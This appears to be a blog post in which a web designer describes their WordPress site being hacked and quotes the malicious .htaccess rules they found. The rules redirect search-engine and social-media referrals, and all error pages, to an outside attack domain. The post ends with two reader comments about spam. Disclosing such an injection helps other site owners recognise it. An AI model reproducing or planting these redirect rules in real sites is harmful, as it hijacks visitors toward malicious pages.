It’s just wrong!! ?>

It’s just wrong!!

a&b WebDesign has been hacked and Malware was inserted into the site. I am not sure how it happened, but what a mess!!!! I had to delete everything and start over with a whole new installation. That’s when one gets to appreciate the real value of a good backup. Mine could have been better, but I had enough to recreate everything, and I’ve learned some valuable new lessons.

However, I don’t take kindly to this kind of act. There’s not much I can do about it, but post whatever information I have gained and hope it will help someone else. The first attack was on my .htaccess files, where I found this: (I am only posting an image of the stuff. I do not know what this code does, and do not want to unleash their evil accidentally):

I still have no idea what that all means, but it was easy enough to delete. But only the next day, I found this in the same .htaccess file:



RewriteEngine On
RewriteCond %{HTTP_REFERER} ^.*(google|ask|yahoo|baidu|youtube|wikipedia|qq|excite|altavista|msn|netscape|aol|hotbot|
goto|infoseek|mamma|alltheweb|lycos|search|metacrawler|bing|dogpile|facebook|twitter|blog
|live|myspace|mail|yandex|rambler|ya|aport|linkedin|flickr)\.(.*)
RewriteRule ^(.*)$ http://piramiddynamyc.in/sapog/index.php [R=301,L]

# BEGIN WordPress

RewriteEngine On
RewriteBase /
RewriteRule ^index\.php$ - [L] RewriteCond %{REQUEST_FILENAME} !-f
RewriteCond %{REQUEST_FILENAME} !-d
RewriteRule . /index.php [L]

# END WordPress
ErrorDocument 400 http://piramiddynamyc.in/sapog/index.php
ErrorDocument 401 http://piramiddynamyc.in/sapog/index.php
ErrorDocument 403 http://piramiddynamyc.in/sapog/index.php
ErrorDocument 404 http://piramiddynamyc.in/sapog/index.php
ErrorDocument 500 http://piramiddynamyc.in/sapog/index.php

I don’t know who you are, piramiddynamyc.in, but you are not and will never be my friend. And whoever reads this, don’t go there. I tried, just to see the enemy’s camp, and FireFox warned me that this was an attack site, so I didn’t enter.

Unfortunately, it didn’t stop here – just when I thought my house was clean again, all my .php files got attached. Now talk about a huge mess – there are loads of those inside a WordPress site. This time, I found the code shown in this image. Clearly, I had been attacked by www.turnitupnow.net – or on behalf of them.

I don’t know what kind of a crap organization turnitupnow.net is, that they resort to this kind of ‘advertising’. I suspect that all three attacks were done by the same person(s), and I sincerely hope someone out there knows enough to shut them down once and for all. I have wasted the last week of my life cleaning up their mess, and I’m still not completely done.

but you know, I’ve learned a lot …

3 thoughts on “It’s just wrong!!

  1. Actually, the captcha feature takes care of spam form submissions, and the WordPress Akismet handles the rest. My main concern right now are manual spammers – but since I have WordPress set to where I need to pre-approve any comments, none of the spammy ones will ever make it to the actual site.

  2. I’ve found that WordPress is especially a target for these kinds of things and it is quite ridiculous… spam e-mails, blog comments and the like. I don’t know of a fix yet.

Leave a Reply

Your email address will not be published. Required fields are marked *